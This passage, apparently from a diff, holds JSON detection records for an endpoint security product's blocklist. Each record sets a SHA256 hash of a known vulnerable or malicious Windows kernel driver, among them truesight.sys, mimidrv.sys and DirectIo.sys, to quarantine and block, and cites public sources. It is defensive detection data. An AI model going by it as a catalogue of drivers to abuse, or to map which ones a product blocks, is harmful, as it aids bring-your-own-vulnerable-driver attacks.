+ "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479511Z", + "creation_date": "2026-03-23T11:45:30.479514Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61bd9a26c01371d865e681f6354853dc0e27b1064906cd99b15220098be6e88d", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f43bddf-9720-5ed2-a68c-defa3ca22e3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981857Z", + "creation_date": "2026-03-23T11:45:29.981859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981864Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9", + "comment": "Vulnerable Kernel Driver (aka DirectIo.sys) [https://www.loldrivers.io/drivers/ce2d41fd-908f-414c-b6b5-338298f425b8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f5617c0-7538-55ca-bf2c-cbb7458b914c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817151Z", + "creation_date": "2026-03-23T11:45:31.817153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e1688a6c7d649ae588ef418fc3732a910a5e9c0d0be02b1f9ea00a0af8cff79", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f61f096-86e5-5770-b903-f2a833916d78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500203Z", + "creation_date": "2026-03-23T11:45:31.500206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1f4d2141dbe75a2df46858bc9a4fca9a0f40341e1176a06c0053e4c5b3f3ddd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f76f804-a448-5193-88ee-190fcf61212c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820842Z", + "creation_date": "2026-03-23T11:45:30.820844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71c0ce3d33352ba6a0fb26e274d0fa87dc756d2473e104e0f5a7d57fab8a5713", 
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f7c0e58-f5a9-5cf4-b97d-486a614fbd26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490627Z", + "creation_date": "2026-03-23T11:45:31.490629Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "071336578deab97acdc527d45d67122ab60792452e87e2c4266290cf5256ee5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f9a184a-250e-54f2-81e1-8fcf735e6d8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.464507Z", + "creation_date": "2026-03-23T11:45:30.464511Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f9adde1-e4ae-5b02-b8b2-aafd85316833", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480507Z", + "creation_date": "2026-03-23T11:45:30.480509Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf63f518c9e45fe87d336c87938eb587049602707f1ed16d605f8521f88e4a96", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"9fa0cc83-f406-59b3-9c36-31847d8bbe11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472022Z", + "creation_date": "2026-03-23T11:45:31.472025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8005fee105b6f251dc19050ea88526f12fc87eb9a7326ad65638fe5d0e1d2efa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fa4c017-9654-5e44-af87-98f895df6718", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157015Z", + "creation_date": "2026-03-23T11:45:31.157017Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.157022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18d02775e841b6e56ea1f9b2dc56a3596dc2f3e0480ffd5f0cacf4e7e724de38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fa6bfc5-f95e-5596-9358-1c852a366575", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480616Z", + "creation_date": "2026-03-23T11:45:30.480618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6370c82c2dbdf93608cccb88d78468edeb27f5d08f9ed0baf161842c0751f6a4", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fb01145-e9bf-5ca0-a00b-6ff17d666196", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472259Z", + "creation_date": "2026-03-23T11:45:31.472263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1bb1d40fca74e8b9779f6a8dfe2aa39350fcd046fb132ee1e63f11576c4a1f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fb4c515-f2b4-5452-a6a7-498f84863df3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487487Z", + "creation_date": "2026-03-23T11:45:31.487489Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "92e8e56516313d95a3848cc8bf31f62772f9429b24005d59ccf45fb2c9865806", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fcced42-d254-51f3-bfe5-bab106d8d5b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143686Z", + "creation_date": "2026-03-23T11:45:31.143688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4ee46b5a64e9b71632e6bccc028ae959718fe15625dd2dea6a51f7cc015e399", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fdae2e8-aafb-5ecd-b928-1c6bb6ae6c3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618426Z", + "creation_date": "2026-03-23T11:45:29.618428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd94be9ac97f06abe64426933fbee02871d5d181b1d9025daf1aaa92d9342e90", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fdcebfc-1fd6-5c4f-af1e-f995e4007826", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458964Z", + "creation_date": "2026-03-23T11:45:30.458967Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47e35f474f259314c588af35e88561a015801b52db523eb75fc7eccff8b3be4d", + 
"comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fdecf22-f3bc-552e-a0a7-80456fd7a070", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481961Z", + "creation_date": "2026-03-23T11:45:31.481965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1b9f1931bc06e8c1e960ba68e47793ba665ee7867fd506380284c56c82eb891", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fe1f196-abaf-5987-9479-2cda5786f07b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.604392Z", + "creation_date": "2026-03-23T11:45:29.604394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604399Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ad2df1ae0c1ffaa2492de91bbe24ff6bf2b2beb18a62366207dfb4257ed5c60", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9fed866a-4ffd-5f83-9ef5-bd003504f9d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836226Z", + "creation_date": "2026-03-23T11:45:30.836228Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b42083b947b3470a55bb521a09099c25d87da901636ecd44db5772b8f9dcabd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "a00fdff5-7af7-55d2-880c-c36ef64ce3b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157475Z", + "creation_date": "2026-03-23T11:45:31.157477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "beb70f7809807d896af9f895e13f81619bef76ae1a365bd474a48c832845b291", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a014a0f7-396d-59e5-9ad3-214d83060ab1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828913Z", + "creation_date": "2026-03-23T11:45:30.828915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828920Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9b66666884c70dbf81a6527ecabe874406c7000f799a1c40a12e879a88b3946", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a02aaf1d-192a-59ba-8f51-431a901e137e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499216Z", + "creation_date": "2026-03-23T11:45:31.499219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b81fd3758ff5699d0a19666084589e26c852c1b09cc5ad4d95738ed752696c71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a02c8c9b-5d11-568c-ab26-3039aacfee33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811169Z", + "creation_date": "2026-03-23T11:45:31.811171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb1b4cda773e14f1cca653451fce84d908fdc22d1acddae42627b9711012ba90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a03c4320-54e7-5edd-916d-7a44c8911a8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150967Z", + "creation_date": "2026-03-23T11:45:31.150969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e74d2b56f8ea71f5ba816420cefd44a7f780bcc97a6e315226705edd107f69ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0421c55-eb48-5989-b144-d84321c73057", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977495Z", + "creation_date": "2026-03-23T11:45:29.977498Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977503Z", + 